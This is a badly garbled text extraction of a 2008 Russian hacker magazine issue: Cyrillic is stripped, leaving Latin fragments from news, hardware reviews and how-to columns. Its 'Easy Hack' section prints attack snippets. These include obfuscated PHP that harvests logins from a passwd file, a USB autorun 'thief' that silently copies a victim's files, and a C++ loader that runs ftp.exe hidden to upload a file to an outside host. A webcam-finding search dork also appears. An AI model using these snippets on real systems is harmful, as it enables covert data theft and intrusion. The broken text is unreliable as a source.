Вы находитесь на странице: 1из 165

SIM-

. 116

www.xakep.ru

05 (113) 2008

web-
7

web-
. 30

.4


Oracle
. 52

. 62

TV

-
FreeBSD

. 122

. 138

>> inside

/ STEP@GAMELAND. RU/

x 11 /107/ 07

CONTENT05(113)
004

MegaNews

100

104

FERRUM

Delphi

016

110

C#

022

114

\++

024

ADSL -

ZyXEL P660HTW2 EE

PC_ZONE


116

SIMphonia

SIM

122

026

030

Web-

XAKEP.PRO

128

Longhorn

036

Windows Server 2008:

132

041

Mobile tricks

Squid:

Asus 100%

138

FreeBSD

144

BSOD
Windows Server 2003


044

Easy Hack

048

052

148

Oracle,

058

152

FAQ United

FAQ

062

156

068

158

C# A Z

8,5

074

-Tools

160

WWW2


076

080

X-Profile

084

X-Stuff


086

FreeBSD 7.0

090

PPP

PPPoE PPTP Linux

096

Linux

Intro
.

, ,

. , , -

, -

opensource-

, . -

, .

Windows

: GSM A5/1

opensource-

. 5

Skyper THC

Wordpress

HITB 2008. ,

$700 ,

. -

, .

nikitozz, . .

udalite.livejournal.com

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)


(magazone@real.xakep.ru)
UNIXOID, XAKEP.PRO PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)
> Unix-
Andrushock
(andrushock@real.xakep.ru)
>

/Art

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

(kiselev@gameland.ru)
>

>

(rodionkit@mail.ru)

(chill.gun@gmail.com)

/xakep.ru

>

(xa@real.xakep.ru)

>


(goryacheva@gameland.ru )
>

(olgaeml@gameland.ru)

(alekhina@gameland.ru)
(belov@gameland.ru)
>

(alekseeva@gameland.ru)
>

(Strekneva@gameland.ru)

/Publishing

>

(noah@gameland.ru)

(sidorovsky@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)

>


(andrey@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,


,

77-11802 14 2002 .

ScanWeb, .
100 000 .
.

.
:

. ,

,
.

.


.

.

>> meganews

Meganews

Mifrill
/ mifrill@riddick.ru /

- .
22" VLED221wm
ViewSonic , HighDefinition, ,
.
118% NTSC 12000:1

70-75% .
5 , 1680 x 1050,
SRS WOW HD -
, .
,

, $700 $800, . ,
$1000 ,

:) .

$3 Silicon Alley Insider,


. Wikipedia : $7 .

Microsoft : , !
Windows .
Windows Vista , Microsoft
MSDN
.
( )... !
RoboChamps 2008
,
,
,
, . Microsoft
, ,
.
Robotics
Studio 2008,
www.robochamps.com,

. SDK- -

004

, 400 .
,

6 :
1. ;
2. ;
3. , ;
4. ,
;
5. ( );
6. ,

.
27-30 - . , MSDN Microsoft Robotics
(msdn2.microsoft.com/en-us/robotics/default.
aspx), ,
Robotics Studio 2008 .

x 05 /113/ 08

>> meganews
Imagine Cup 2008

11 , ,
Imagine
Cup (www.imaginecup.ru).

6 , 2003 ,
Microsoft, , .

( )
IT,
,
,
.

117 .
: , .
Imagine Cup.
,
, ,

(www.photocup.ru).

. 400

,

006

Arina,
.
,
,
,
.

. ..
.Life,
.

, AirRanger,

.

,
RedDevils (
, ).
Imagine Cup
.

-
Imagine Cup 2005, -
- .

x 05 /113/ 08

>> meganews
-
Vista XP
, ! , ,
SP1 Windows Vista.
,
, . -, Vista

. 80000 ,
, . ,
Vista 150 -
, Adobe, Cisco, IBM, Oracle,
Sun .
-, , . ,
.
, -

.
-, .
SP1 Vista
.
Vista .
,
, ,
, -.
, .
.
, Vista UEFI
- ExFAT.
SP1 Vista Microsoft .
, ,
SP3 XP. ,
, , SP2.
, , Vista
, Network Access Protection Windows Imaging
Component. , , Microsoft XP. SP3
.

Mobile Research Group, iPhone

500 000. . , ?

, ,

LG
. , ,
. W42 - 19", 20" 22".
8000:1, 5
LG f-ENGINE, .
, T ( W2042T),
DVI-D,
HDCP.
W00 . W2600HP W3000H,
26" 30" , , ,
, HD, 1920 1200 2560
1600. , , $1400
W2600HP $2250 W3000H.

3,6
. $3,2 .

008

x 05 /113/ 08

>> meganews

6 9
ACM ICPC,
IBM. 32 100
,
: 11 .
- 11 ,
. , 8 11 ,
. MIT , , . 5 .

700
. 2008
Wikipedia
.

Sun Tech Days

-, ,
Sun Tech Days. , 10
Sun Microsystems ,
, , Solaris Java.
Debian GNU/Linux - Sun Microsystems

010

(Ian Murdock), (Rich Green)


- Sun Microsystems,
, . 2008
JavaFX, Solaris, GlassFish, JavaSE7, OpenJDK .
72 6 -.

www.developers.sun.ru/techdays.
x 05 /113/ 08

>> meganews


- A1
. ,
A-ONE. , ,
, WAP-,
. A-ONE
,
, ,
. , ,
MMS
A-ONE .

:
-

(40%)

5%

- 0.
.

GPS

(GPS)

,
.


.
, 2025
GPS .
? !
GPS jammer,
, . , , ,
!
, GPS- ,
.
GPS,
, 5 . , GPS (
)
, 265$, ?

torrent-

BitTorrent ! !
!,
- demonoid.
com. :
9
. ,
, . ,
, -, Colocall. ,
,

, . ( )
.
The Pirate Bay ,
.
. The Pirate
Bay . Baywords
(baywords.com) ,
, ,
.

Capture The
Flag

26 28 ()


Capture The Flag, 9 .
,
.

.
www.
rustf.org.

012

x 05 /113/ 08

>> meganews
HITB?

HITB,
THC ,
.
, , ,
. ,
,
A51. ,

GSM. .
, , $1000,
SMS,
! , ,
.
Nokia 3310
USPR (Universal Software Radio Peripheral) , - ,
. ,
, . ,
- .
blog.thc.
org, , .


VoIP, - ,
.
,
.
. Wi-Fi
Wi-Max, .

VoIP-,
? ? , . ,
Skype
. 24
, Java. 50 Nokia, Motorola,
Samsung Sony Ericsson, - ,
,
SkypeIN.
Skype / Skype
Out .
: GPRS- ,
.
, GSM.
, , , , , .
x 05 /113/ 08

13

>> meganews

, , -,
, :).

.
NTT,
, Firmo.
-, .
, .

, .
230 /c,
, RedTraction,
, 10 /c.
$8000 , 5
.
, . ,
,
, , :).

PayPal
PayPal . ,
.
PayPal,
, ,
. , ,
, -
,
.
,

,
EV SSL (
SSL

).
.


.
. ,
, ,
.

014

x 05 /113/ 08

>> meganews

393 30 , .
, ? :)

Hack in the Box


14 17 IT-
Hack in the Box 2008
. , , HITB
,
. .

,
IT-. :
1. GSM A5/1,
GSM . SMS .

x 05 /113/ 08

2. VSAT , Rogue AP Wi-Fi,


Man-in-the-Middle . ,
SAT-.
3. VoIP IP-.
4. Embedded ,
SOHO-, : , Wi-Fi , ADSL, ..
,
, .

15

>> ferrum

, , ,
. ,
, .
, , ,
. ,
.
. ,
5-10
,
.



. ,
8
90%. .
, .
20 - Wi-Fi
,
.
. Battery Eater05 1.0 . ,
,
3D -

. ,
, , .
, , 186 230 .
,
, .
,
. ,
. ,
,
.

,
. ,
, 0 260 . ,
.
,
Ippon Back Verso
400
Ippon Back Comfo
Pro 600
CyberPower Value
800E

:
: Intel Core 2 Duo E6850
: Zalman CNPS9700
: ASUS P5K-E
: 2 x 1024 , Kingston DDR2, PC-8000, 1000
: 512 , Chaintech GeForce 8800GT
: 400 , Western Digital 4000AAJS 7200 /, 8
: 580 , Hiper HPU-4M580
: 21", Samsung 215TW
: USB
: PS/2
3.5":
5.25": ASUS DRW-1814BLT

016

CyberPower Value
600E
APC BE700RS
000

APC BE550RS
00:00 01:00 02:00 03:00 04:00 05:00 06:00 07:00 08:00 09:00 10:00 11:00

test_lab
(.(495) 739-0959, www.merlion.ru),
CyberPower APC
x 05 /113/ 08

>> ferrum
ST BUY

ICE

TORs

TO
s CHOICE

ST BUY

EDI

EDI

HO
BE

BEST BUY

BE

2400 .

2600 .
APC BE550RS
:
, : 550
, : 330
: 180-266
:
4 , 4
: 16
: 4
: USB, RS-232
: /
, : 230 x 86 x 285
, : 6.4

. - ,
. , barebone-,
, , .
.
, .
.
, .
APC BE550RS
, . 330 .
, ,
100 ,
? 6
.
, .
, 140
.
/ , ,
, . . :
.

x 05 /113/ 08

APC BE700RS
:
, : 700
, : 405
: 180-266
:
4 , 4
: 16
: USB, RS-232
: /
, : 230 x 86 x 285
, : 6.8


. , 405 ( 330
). , APC BE700RS
:
8,5 , ,
(, Photoshop) .
,
.
, . PowerChute Personal :
, , .

. , ,
.
, .
, ,
205
( 180 ). ,
,
, ,
.
, , . ,
.

017

>> ferrum

2000 .

CyberPower Value 800E


:

1300 .

, : 800
, : 480
: 165-270
:
3
: 8
: USB, RS-232
:
, : 100x140x320
, : 6.1

CyberPower Value 600E


:
, : 600
, : 360
: 165-270
:
3
: 8
: USB, RS-232
:
, : 100x140x320
, : 5.3

, ,

.

.
.

RS-232, USB.

165 . CyberPower Value 600E
6 .
,
. ,
,
? ,
, .
1000 .
8 , .
, , , ,
,
, ,
.
, , ,
30 . ,
, .

018

, ,
.
10 . ! ,
, .
.
, , .
,
, . ,
. 165 .
, . PowerPanel Personal Edition .
,
.

(, DSL-, ).
,
.

Ippon Back Verso


400
Ippon Back Comfo
Pro 600
CyberPower Value
800E
CyberPower Value
600E
000

APC BE700RS
APC BE550RS
0

50

100

150

200

250

300

x 05 /113/ 08

>> ferrum
ST BUY
BE

BEST BUY

BE

ST BUY

1900 ..
1200 .

Ippon Back Comfo Pro 600


:
, : 600
, : 360
: 154-264
:
4 , 2
: 8
: USB, RS-232
: /
, : 300 x 124 x 210
, : 7

, , .
, . ,
,
. , ,
.
,
. DSL- , . ,
, .
165 .
.
, COM- USB
. . .
, java.
Java . , - - ,
. ,
, . , ,
,
.



APC BE700RS .
,

020

Ippon Back Verso 400


:
, : 400
, : 200
: 154-264
:
4 , 2
: 8
: USB, RS-232
: /
, : 124 x 166 x 202
, : 3.3

. barebone, , , .
200 ,
, . , , .
Ippon back Verso 400 154 ,
. ,
USB COM-. , , java
. , , , . , ,
? Ippon back Verso 400
3,5 .
8 . , ,
, . ,
,
, .
, , : , ?
,
, .

. Ippon Back
Verso 400 , .
, ,
.z
x 05 /113/ 08

Sennheiser PC 131
VOIP-
PC 131
, ,
, .
. ,
, Sennheiser ,
- ,
!

,

.
,
.

.

.......... 30 18 000
............. 32
.......118
............... 3

............... 80 Hz 15 000
.........(-) 38 dBV/Pa
.............2 k


Sennheiser :
1. . Skype (www.
skype.com) Gizmo (www.gizmoproject.com).
, ! ,
, .
, .
2. 5 ,
. : ,
,
TeamSpeak (www.goteamspeak.com)
. !
3. - .
DFX (www.fxsound.
com).

.

>> ferrum

4
4000 .

2700 .

Brother HL-2140R

Creative I-Trigue 3000


: 2400 x 600 /
: 181
: 8
: USB 2.0
GDI
: 250
: 368 x 361 x 170
: 5,8

:6 RMS (2 )
12 RMS ()
: 40 ~ 20

: Line in ( ) 3,5
/

1. , ,

1. .
2.

.
2.
USB, .
3. .
4. 250
.
5. 8 .
6. 35 .
7. ,
( ).
8. :
, , . .

.
3.
, .
4.
.
5.
.
6. .
7. mini-jack.
.

1.
.

2.
1.
, .

022

(,
).
x 05 /113/ 08

>> ferrum

900 .

700 .
Genius Navigator
365 Laser
-

Genius
Traveler 350

: USB
: 800/1600 dpi
:
: 2
: , 8 , /
Clear
: -

1. .
2. 800 1600 Dpi.

:
: USB
: 2 , 2

: -

, !

3. - ,
.

4. .
5. .
6. USB .
7. .

1. , ,
.

2.
.

3.
.

4. ,
.

1. ,
.
2. , , .
3. .

test_lab
Genius, Creative Brother
x 05 /113/ 08

5.
. .

6.
, .

1. .
2. , , (
, ).
3.
.

023

>> ferrum

2600 .


ADSL - ZyXEL
P660HTW2 EE

ST BUY
BE
ST BUY

BEST BUY

BE

ADSL, - , , , , ,
, , , Annex-. .
,
,
? ZyXEL
- P660HTW2 ADSL2+.


ADSL- (, , Absolute ADSL, , -, ), Wi-Fi ,

. ,

024

, ,
WPA2PSK.
NetFriend. ,
zyxel.ru, .
ADSL-, , .
- :
,
1 3,5 Annex M
7 Annex L.
, ,

x 05 /113/ 08

>> ferrum

ZyXEL NetFriend:

IPTV, .
NetFriend , . , -
(NAT),
,
. DynDNS,

.

ZyXEL NetFriend:


1 RJ-11
4 RJ-45 ETHERNET (10BASE-T/100BASE-TX)

ADSL2+ (G.992.5)
Annex A, Annex B, Annex M, Annex L (RE
ADSL)
SIP (SIP ALG)
VPN- (IPSec, PPTP, L2TP), PPPoE
802.11 b/g
: IEEE 802.1x / WPA /
WPA-PSK / WPA2 / WPA2PSK
WEP- 64/128/256
: (SPI)
DoS- DDoS-


: NetFriend, -, TELNET,
SNMP, FTP/TFTP
:180 x 128 x 36
: 350

x 05 /113/ 08

, P660HTW

, -
.
. ZyXEL P660HTW2 Wi-Fi. ,
,
-. :
, 90 /.
15-30%. 90-100%.


- ,
( ,
, ), , .
- , NetFriend
,
. , .
, , ,
- ?
ZyXEL P660HTW2 EE . z
Absolute ADSL
Absolute ADSL,
- ZyXEL, : ,
, / ADSL2+,
Annex A Annex B. ,
- ,
-
ISDN. :
,
( Annex L), ,
1 / 3,5
/. , ZyXEL, , NetFriend.


.

025

>> pc_zone

. www.virustotal.com
, . ,
.

,
(
),
.
www.virustotal.com.
. , (www.
viruslist.com/en/weblog), virus-total,
,
. , ,
rootkit ,
, , virus-total,
, /
API-, .
,
. ,
, , -

026

virus-total .
? virus-total ,
,
- ( , !).
,
( )
,
. , , ,
, ,
.
, , . ,
.
, , $2000 . -
, , .
Core2Duo
.
x 05 /113/ 08

>> pc_zone
, , .
(, Perl, PHP) CGI (
, CGIC).

. ,
. rich- plain-,
!

Virus-total

info

Virus-total , .
,

,
(pipe).
? , , /,
( ,
).
Perl,
, -
, (,
).
, , virus-total
. : -,
, , , , ,
GUI-. ,
virus-total
virus-total.
, ( GUI-
)
log-
, , DDE
(Dynamic Data Exchange), GUI- .
, log, , .

,
HTML- ,
.
, ,
Windows- (Windows Message
, , WM). WM-
, ,

, ,
PDF ,
,
,
. x 05 /113/ 08



.
. . ,

, , Windows .
,
, , ,
. ,
,
. :

. ,

( ),
rescan;
CRC32
, (
),
,
4 , . CRC32 ,
MD5 . :
, ,
CRC32 MD5 (

), CRC32 (
) , ,
MD5 ? ,
;
(
)

Microsoft, -

,
?!
,
?
( )
- . :
,
,
, .
,
,
.

,

. ,
,
,
,
(
,

).
- , ,
,
, ,
.

, virustotal.com,

.

.


(


),

.



][.

warning

.
, ,

, ,

(
)
.

027

>> pc_zone

PEiD, /

, Microsoft, ,
?!
, (
virustotal).
,

( ), ,
/, . ,
( )
,
. ?
,
. ( )
( ), -
: , IP ( IP,
IP , IP ). zip

. , ,
, .
, , .
,
- ,
GUI- , , ,
. . ! , :

, ,
,
. , ,
.
, , ,
( virus-total), TCP/IP
,
, .
( virus-total)
, -
, ? ,

028

virustotal.
,

(EULA)
, - .
, . !
!

, , , . ,
,
. . , .
? , , ,
.
. , , ,

.
,
, !
, .
,
( ) , , , .

x 05 /113/ 08

>> pc_zone

, . ,
TCP/IP
ID ,
, , ,
, .
e-mail .
PEiD,
/ (,
). , ,
. 99%
, ,
,
,
. , ,
, -
.


.
, , -.
.

XSafe ,
MS-DOS

. , , ,
, , , ,
- ..
, , , , ,
,
. .
,
. , ,
, ,
$1 ( ). , ,
, , , ,
.
.

? , !
. ,
. ,
() . ,
. IT- , ,
- SMS
(
, , ). ,
,
, ,
( ) . ,
, .
- SMS. , 150 , 450,
.

?

/ . (

)
x 05 /113/ 08

, , , . , ,
. z

029

>> pc_zone
STEp
/ step@gameland.ru /

Web-
c -

. . ...
. , - ?

-
. , ,
.

1.
DozoR (www.dzzzr.ru)
Wi-Fi .
: . , ,
3000 ., . ,

030

,
. ,
. Wi-Fi ,
? Windows Mobile,
. WebCamera Plus (www.ateksoft.com)
: ,
( ). Wi-Fi, Bluetooth GPRS ( ,
) -. x 05 /113/ 08

>> pc_zone

links
,



: www.instructables.
com/id/Making-aNight-Vision-Webcam.



pages.cpsc.ucalgary.
ca/~hanlen/vision/
facelinks.html

: Wi-Fi IP-
IP- , . ,

. ,
Skype, Virtual Dub
, ,
! WebCamera Plus
.
:).
,
(
USB). ,
-. ,
. Symbian
, .
Wi-Fi, Mobiola Webcam (www.
warelex.com) USB Bluetooth,
Symbian S60 UIQ.
Nokia,
Sony Ericcson.
Java :
Mobiola Webcam Lite. , ,
Bluetooth.

info

WebCamera Plus


,

.
Wi-Fi
, ,
,
, ,
1500 .

TV.
,
.

2.

( , ),
.
.

,
? !
Webcam Zone Trigger (www.zonetrigger.com).
, ,
- ( ), . ,
,
.
. - (, , ,
), .

. , x 05 /113/ 08

, Webcam Zone
Trigger

.
email/SMS- - HTTP-. , .
, , . ,

DV-, TV-,
IP-.

UVScreenCamera
(www.uvsoftium.ru)
,
-
. ,
,
:).

3. ,

, !
. , , ,
- . ,

031

>> pc_zone

Camera Mouse 2008 c , ,

. , - - ! ,
:). ,
BioLogin (www.idiap.ch/biologin).
, ,
!

4. !

.
,
. , Lemon Screan

-. ,
, ,
. .
: LemonScreen
(www.keylemon.com) , , .
.
Enrollment. , , , . ,
. .
(Face detection confidence) .
(
), Update model
. ,
. ,
, - .
60 - , LemonScreen
. - . , .

! , , . , ,
. , LemonScreen . ,
. ,

032

,
. , - ,
, . , ,

. : (
, ,
). ,
, !
, - Camera Mouse
(www.cameramouse.org) .
,
. -
( , , ),
. . <Numlock> :
, !
: ( ),
. :
! , ,
.
!

5. !
,
( ).
,
,
, .
YouTube.com, ,
. HandVu (www.movesinstitute.org/~kolsch/HandVu/
HandVu.html) . ,
OpenCV, . - , ,
2006 , ,
.
HandVu, .
. Hand Gesture Interface (www.cmpe.boun.edu.tr/~keskinc)
x 05 /113/ 08

>> pc_zone

info

Hand Gesture Interface


, . ,
:
,
. ,
.
: .
: ,
. ,
,
.

6.
, - ,
, , , ,
- . , , ,
.
- - .
,
Mando (sourceforge.net/projects/mando).
- ,
,
,


Wi-Fi
, , .
wireless-
, , .
,
, , .
, WEP-
.
,

(IV) . x 05 /113/ 08

. , , ,
. , ,
,
. Pointand-click . (
- ) Mando ,

KDE. :


.
,

OpenCV (sourceforge.
net/projects/
opencvlibrary),

.


.

tar xjf mando-1.6.tar.bz2


cd mando-1.6
./configure
make
./mando
. :
. , : ?!

7.

, -


:
channel
channel
channel
channel

A
B
C
D

=
=
=
=

2,411
2,434
2,453
2,473


hauditor (itdefence.ru/content/product_news/irat),
web- , , . ,
.
, - - Google. ,
: url:/view/index.
shtml inurl:ViewerFrame?Mode=.

033

>> pc_zone

webcamXP ,

, .
webcamXP (www.webcamxp.com) - - .
.
,
, . webcamXP
.
, :
Java, Javascript Flash.
.
,
. .
Active WebCam (www.pysoft.com).
, .

web-, - ( , TV
) 30 .
,
, . ,
. Active
WebCam .
, , . , - , NAT
, Skype (www.skype.com)
. (Tools Options
Video) ,
. z


RC- ,
, ( LEGO,
), .
-! ,
, ,
. , ,
. :
RoboRealm
(www.roborealm.com). , ,
. -, ,
, (www.roboforum.ru)
(roborealm.narod.ru) .

034

, .

x 05 /113/ 08

>> pc_zone

, . ,
. - ,
. , ,
.
!
,
: . .
, : ,
.
IT. . . - ,
. ,

036

. ( )
,
, , , .
,
, .
: ,
, , . , , .
x 05 /113/ 08

>> pc_zone

PHP : . , 3 ,

, ,
.


, .
, ,

:
- .
.

?

, , , . , -
,
. ,
. , ,
, .
. ,
. ( , ) ,
. ,
,

. ,
. , , .
, ,
,
, , , .

?
: - ? e-mail,
, , .
,
, -.
, ,
-
. , free-lance.ru weblancer.
net ( ). , www.
getafreelancer.com ( GAF). :
, , , , . ,
, ,
www.getafreelancer.com ( ).
,
, Sign Up.
: e-mail,
.
,
, (,
XML, PHP, JavaScript), .
, , .
x 05 /113/ 08


() , : ++, XML, Flash, OS.
: , ,
, -. , GAF
.
, ,
: (, ),
. ,
, ,
.
.
, , .
.
, ,

. , .
,
, , !
. ,
Gold membership.
12 . ,
.
, Gold membership . ,
,
. Gold membership , ,
!
, ,
, ,
,
( ,
). , ,

info

,

,
,
.
,
. ,


.
www.
getafreelancer.com




rentacoder.com.



,



.
elance.com.


, , :
Fedora 6 Postfix, Courier,
Mysql, Postfix, Fedora 6 (100$);
- (300$);
4 (100$);
2000 c Perl Java (2000$);
- (4500$).

037

>> pc_zone

GetAFreelancer

. , ,
,

( , ). , ( Gold membership) ,
,
. ,

, , , ,
.
, - !
, -
Please check PM (, ),
GAF.
,
. , ,
. .
C++,
.
: 90% , ,
. ,

weblancer.net. ,
2003 .
. -.
,
.
www.free-lancers.net. , ( 1%),

( -).
freelance.ru.
.
,
.
PHP, MySQL Perl.
free-lance.ru. ,
:
. : -, ,
, Pro.

038

,
.
,
Project Bid Won, Frozen.
.
www.getafreelancer.com Project begins,
e-mail . Closed.
Gold membership,
(10%, $5). ,
. . ,
! ,
escrow- ( ).
. , , . ,
. . , ,
. .




: ?
, ,
$1k $3k, -
. $10k
. - $100
$500. ,
: . ?
( , ),
OpenRCE.
org, .
,
: ,
Microsoft: , .
, ,
, -
. ,
- .
,
.
,
, ...
x 05 /113/ 08

www.Xakep.ru

@xakep.ru

>> pc_zone

GetACoder.com , !


, ,
GAF. : PayPal,
Moneybookers, , E-Gold
. , PayPal -
,
. . , , E-Gold 5%.
E-Gold $30, $250 .
, 45 ( ). ,
, , ,
. , E-Gold Webmoney.

,
.
.
, E-Gold.
GAF ( -
). , , GAF:
.


. , . , .
Porsche Cayenne,
. ,
, . ,
. z

escrow?
GAF
escrow-, . ,
, (escrow release).
escrow-
(
).
www.getafreelancer.com. escrow
.

040

x 05 /113/ 08



ASUS Trend Club ,
. 5
, Trend Club: , ,
, .
* www.asusTC.ru.

| ,

| c

| ,

* : , MAXI tuning, , , , .

| | | |

SMART
tricks

Asus 100%

Asus P750
: Marvell PXA270 520
: 64 RAM, 256 Flash ROM
: 2.6,
240x320, , , 65536

: microSD (TransFlash),
microSDHC, SDIO
: EDGE, HSDPA, Wi-Fi,
802.11b/g, Bluetooth 2.0
: Li-Ion 1300
: Microsoft Windows
Mobile 6.0 Pro
GPS: SiRFStar III,
3.1
: 58x113x17
: 130

, Asus.
, ,
. ,
.

, . , :
,
,
. Asus: Asus P750. 520 , , 64
, Bluetooth, Wi-Fi, GPS
, - .
, , .
Windows Mobile,
Asus , . , , , ,
SDK, .
,

042

.
.
,
,
.
, .


.

.
?
,
xRay PDAFinder.

SIM-, SMS
. :
, IMSI- SIM-, IMEI , ,
.

/ .
.
Hard Reset,

.
. , ,
: 4pda.ru/forum/index.
php?showtopic=58768&st=0.

,
WM_HIBERNATE.
,
:
, .
,

x 05 /113/ 08


:
-:


|
.
|
.

|
. ASUS P5E3 Premium /WiFi-AP @n Edition
| Maxi Tuning |
| |

,
?
, ,
.

( ),
.
Oxios
Memory (www.oxios.com). ,
,

,
, ,
.

Wi-Fi

,


Netstumbler
?
: Asus P750 ,

.
,
, :).
, -
! , .

WiFiFoFum (www.
aspecto-software.com). Asus GPS,


: .
, KML-,
Google Earth
, !

, ,
.
?
,
.


. (mobile.yandex.ru/maps).

x 05 /113/ 08

,
.
:

, , ,
,
.
,
?
, !
. ,


.
,
.
, ,


,
40 /.
!

,
GPRS- . , ,
..
.
,

,


!
? ! toonel.net


.

,

: 127.0.0.1:8080.

,
. ,
,
, !

,

.


VNC Viewer for PocketPC (home.utah.
edu/~mcm5849/wince/vnc.html).
,
: Vista,
Ubuntu Linux - .
,
, Real VNC,
, Mac.

-
SSH. ,

PuTTY
PocketPuTTY (www.pocketputty.net).
:
,
.

.
,
, ,
. ,
.
, , , ?
! ? !
, Wi-Fi,
.
4Talk (www.4pockets.com)
Wi-Fi
Bluetooth.

(.. ,
), (
).


!
,
.

043

>>

Easy Hack}

Dot.err

Cr@wler

R0id

Skvoznoy

/ kaifoflife@bk.ru /

/ crawlerhack@rambler.ru /

/ r0id@mail.ru /

/ furyhawk@rambler.ru /

1
: PHP ,
:
/ .
:
. , PHP . .
1. PHP :

, ,
. ( ) . 70% (
, ). , :).
4. :
$GLOBALS['

']="\x66\x6F\x70\x65\x6E";

$GLOBALS['

']="\x66\x65\x6F\x66";

$GLOBALS['

']="\x66\x67\x65\x74\x73";

$GLOBALS['

']="\x73\x74\x72\x72\x65\x76";

$GLOBALS['

']="\x73\x75\x62\x73\x74\x72";

$GLOBALS['

$fn=fopen("E:\passwd.txt","r");
if(!$fn) { echo("Cant open passwd.txt");} else {
while(!feof($fn)) {
$np=fgets($fn);
$str=strrev($np);
$login=substr(strrchr($str,":"),1);
$rev=strrev($login);
$fp=fopen("E:\logins.txt","a");
fputs($fp,"$rev\n");
fclose($fp);
} fclose($fn);
}

']=\x73\x74\x72\x72\x63\x68\x72";

$GLOBALS['

']="\x66\x70\x75\x74\x73";

$GLOBALS['
$

']="\x66\x63\x6C\x6F\x73\x65";

=$GLOBALS['

if(!$

']("E:\passwd.txt","r");

) { echo("Cant open passwd.txt"); } else {

while(!$GLOBALS['
$
$
$
$
$

=$GLOBALS['

']($

)) {

']($

);

=$GLOBALS['

]($

=$GLOBALS['
=$GLOBALS['

']($

=$GLOBALS['

$GLOBALS['
$GLOBALS['

);

']($GLOBALS['

']($

,":"),1);

);

']("E:\logins.txt","a");
']($

,"$

']($

\n");

);

, ,
passwd-.
2. http://taran.su/abf/ .
GO.
3. . : PHPabf beta v0.1
PHP .

:

:
.
, -.
. , . .
1. USBThief,
DVD.
2. :
batexe

044

$GLOBALS['

']($

);

5. .
5. ,
.

icons
Dump
nircmd.exe
autorun.inf

3. , :
[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.
bat

4. . ,
.
.
x 05 /113/ 08

>>
5. , :
IM-

/

, , , etc


,
/Dump . ,
. , ,
, /.

while(!feof($site_fd))
{
$str = "";
$str = fgets($site_fd, 1024);
if (preg_match($mask, $str, $ip))
{
echo $ip[0] . "<br>";
}
}

:
:
- . .
-,
. -. ( ).
.
1. proxygrabber.php:

}
}

2. _3lf - - ( DVD).

3. , -set_time_limit(0);

( ) Start.
:

if(!isset($_POST['filename'])) { exit(0); }
$mask = '/[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[09]{1,3}:[0-9]+/';

$fd = fopen($_POST['filename'], "rt") or die("Cant open
file");
$site_list = explode("\n", fread($fd, 9999));
foreach ($site_list as $site)
{
if ( ($site_fd = fopen($site, "rt")) !== false)
{

4
: loader ++
:
ftp
ftp.exe. ++.
,
( , ,
-) .
, .
1. ftp.exe :
( IP) . , .
com_file X:\WINDOWS\ftp_commands:

http://www.site.com/list1.html
http://www.site.com/list2.html
http://www.site.com/list3.html
http://www.site2.com/list1.html
http://www.site3.com/list2.html
http://www.site4.com/list3.html

4. , . .
, , . ,
:).

. , com_file:
char param[128];
strcpy(param, "-s:");
strcat(param, com_file);
strcat(param, " ");
strcat(param, "my-host.com");
param : -s:X:\WINDOWS\ftp_
commands my-host.com.
2. . ,
. : , ftp-.

char com_file[256];
char m_dir[256];
GetWindowsDirectory(m_dir,sizeof(m_dir));
strcpy(com_file, m_dir);
strcat(com_file,"\\ftp_commands");
,
(\\) . ,
x 05 /113/ 08

045

>>
ofstream of(com_file); of<<"mylogin"<<endl;
of<<"mypass"<<endl; of<<"cd WWW"<<endl; of<<"send " <<
"D:\\WINDOWS\\regedit.exe" << " " << "regedit.exe" <<
endl; of<<"quit"; of.close();
. cd <_>
( ). send (send <_> <__
>) .
quit - .

5
:

:
, ,
.
.
1. ,
. ,
. ,
ShadowUser Pro. ,
,
( ).
2. Configuration . (Volumes)
,
. ,
, All
Volumes. -

.
3. (Exclusion List)
, . (, , ),

. , .
4. , ,
ShadowMode. Mode
Activate. ,
. .

3. ShellExecute() ftp.exe.
-,
. , SW_HIDE ftp.exe
. :
ShellExecute(0 ,NULL, "ftp", param, NULL, SW_HIDE);
. , , ftp-.

, ShadowMode (
Options Wallpaper).
. :
// ;
;
/ ;
msconfig;
;
;
, ;

? .
ShadowUser ShadowMode, Lose_All_
Changes . ,
ShadowMode. ? :).

ShadowUser Pro

6
:

:
,
. , , , . , OllyDbg (
<F7> <F8>)
. ,
- .
? ,
.
:

046

x 05 /113/ 08

>>
CMP 1, 2;
[__] ;

:
je, jle, jz, jnz. ,

(
CMP). , , ,

, ( ,
EIP
).

, .
.
1. ,
(<F2> OllyDbg).
2. (<F9>).
3. (<F7> <F8>).

:
Excel
:
, , . ,
,
() ,
( , ).
, :
,
.

, Microsoft Excel.
1. Excel.
, VBA-. ,
, .
2.
, PortScan.
3. (
DVD).
( , ), , , ,
... -.
4. ,
. .
(xakep.
ru/post/22983/default.asp).

8
:
:
domainsdb . , ,
.
Google- (http://groups.google.com). ,
Google .
.
. , :
x 05 /113/ 08

FTP- :)

1. Python .
2. , Google- ,
... ! ,
(, , DVD).
3. :).z

047

>>

.
,
.
, , , . ,
.

01

Microsoft
Windows

DNS-

>> Brief
Microsoft
, Windows
. DNS--

Microsoft
!

1989
DNS-, ,
,
. DNS-

, -

048

DNS-
( )
.
(poisoned DNSserver) , ,

www.intel.com,
,
.
DNS-
,
DNS-, ,

DNS-
.
DNS- -
.
IP- DNS-, UDP-
16 TXID
(Transaction ID).

NT ,
Microsoft 2004
, W2K SP4
XP SP2. , ,
... Amit Klein ( Trusteer),
Alla Berzroutchko ( Scanit)
Roy Arends ( Nominet

UK), ,
Windows
. Amit Klein

Microsoft Windows DNS
